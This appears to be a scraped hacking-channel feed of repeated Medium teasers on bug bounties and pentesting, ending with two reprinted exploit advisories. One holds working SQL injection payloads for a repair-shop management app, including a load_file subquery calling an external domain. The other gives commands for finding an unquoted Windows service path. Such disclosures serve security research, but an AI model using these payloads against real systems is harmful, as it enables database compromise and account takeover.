Bug Report Update
https://covercompared.medium.com/bug-report-update-60527f50df98?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://covercompared.medium.com/bug-report-update-60527f50df98?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Report Update
As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every…
As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every…Continue reading on Medium » (https://covercompared.medium.com/bug-report-update-60527f50df98?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Report Update
As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every…
100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
https://online-courses-deals.medium.com/100-off-pentesters-practical-approach-for-bug-hunting-and-bug-bounty-4a04a70f101a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://online-courses-deals.medium.com/100-off-pentesters-practical-approach-for-bug-hunting-and-bug-bounty-4a04a70f101a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude
Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitudeContinue reading on Medium » (https://online-courses-deals.medium.com/100-off-pentesters-practical-approach-for-bug-hunting-and-bug-bounty-4a04a70f101a?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Day2, Navigating Linux — 100DaysofHacking
https://cdn-images-1.medium.com/max/948/1*vrQfauhzkUF2w0DScOnVXA.png
Day1 : Installing Kali Linux
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Day2, Navigating Linux — 100DaysofHacking
https://cdn-images-1.medium.com/max/948/1*vrQfauhzkUF2w0DScOnVXA.png
Day1 : Installing Kali Linux
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Day2, Navigating Linux — 100DaysofHacking
Day1 : Installing Kali Linux
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Sense: HTB Writeup
https://cdn-images-1.medium.com/max/600/0*VYyiTsrofalY8-4S.png
This was a very easy to box to work with. It could have been popped within an hour. It took me 2 days because of network connectivity to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Sense: HTB Writeup
https://cdn-images-1.medium.com/max/600/0*VYyiTsrofalY8-4S.png
This was a very easy to box to work with. It could have been popped within an hour. It took me 2 days because of network connectivity to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Sense: HTB Writeup
This was a very easy to box to work with. It could have been popped within an hour. It took me 2 days because of network connectivity to…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Guía de mitigación de #Log4j #Log4Shell [CISA]
https://cdn-images-1.medium.com/max/1436/0*2HNYEeHZ-ecsMRw6
PUBLICADO EN 3 ENERO, 2022POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Guía de mitigación de #Log4j #Log4Shell [CISA]
https://cdn-images-1.medium.com/max/1436/0*2HNYEeHZ-ecsMRw6
PUBLICADO EN 3 ENERO, 2022POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Guía de mitigación de #Log4j #Log4Shell [CISA]
PUBLICADO EN 3 ENERO, 2022POR DPAB
Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
https://medium.com/@themistocle5/module-1-introduction-pentesting-bypassing-cloud-web-application-firewall-of-major-clouds-2f89cc9669a2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@themistocle5/module-1-introduction-pentesting-bypassing-cloud-web-application-firewall-of-major-clouds-2f89cc9669a2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
Why you should not trust the cloud WAF?
Why you should not trust the cloud WAF?Continue reading on Medium » (https://medium.com/@themistocle5/module-1-introduction-pentesting-bypassing-cloud-web-application-firewall-of-major-clouds-2f89cc9669a2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
Why you should not trust the cloud WAF?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Computer And Mobile Repair Shop Management 1.0 SQL Injection
https://4.bp.blogspot.com/-jEyO8wrBbtw/WWlvSr9oRmI/AAAAAAAAINg/irp20P4NPo4dOJoHHzIQ0XpAovWCMUh6wCLcBGAs/s1600/h38.png
Computer And Mobile Repair Shop Management version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Computer And Mobile Repair Shop Management 1.0 SQL Injection
https://4.bp.blogspot.com/-jEyO8wrBbtw/WWlvSr9oRmI/AAAAAAAAINg/irp20P4NPo4dOJoHHzIQ0XpAovWCMUh6wCLcBGAs/s1600/h38.png
Computer And Mobile Repair Shop Management version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
c25474e7d98558e891f792ea5d29c090Download
## Title: Computer and Mobile Repair Shop Management-1.0 SQL - Injections
## Author: nu11secur1ty
## Date: 12.28.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15108/computer-and-mobile-repair-shop-management-system-using-phpoop-free-source-code.html
## Description:
The `code` parameter from /rsms/ node app, on Computer and Mobile
Repair Shop Management-1.0 appears to be vulnerable to SQL injection
attacks.
The payload '+(select
load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'
was submitted in the code parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take administrator account control on this system.
[+] Payloads:
```mysql
---
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_status&code=202778'+(select
load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+''
AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/RSMS-1.0)
## Proof and Exploit:
[href](https://streamable.com/aa69kd)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Computer And Mobile Repair Shop Management 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
TRIGONE Remote System Monitor 3.61 Unquoted Service Path
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
TRIGONE Remote System Monitor version 3.61 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
TRIGONE Remote System Monitor 3.61 Unquoted Service Path
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
TRIGONE Remote System Monitor version 3.61 suffers from an unquoted service path vulnerability.
MD5 |
3463452fad0a27f3427cf59513fb07fcDownload
# Exploit Title: TRIGONE Remote System Monitor 3.61 Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
TRIGONE Remote System Monitor Server RemoteSystemMonitorService
C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteSystemMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv
er\RemoteSystemMonitorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TRIGONE Remote System Monitor Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
TRIGONE Remote System Monitor 3.61 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.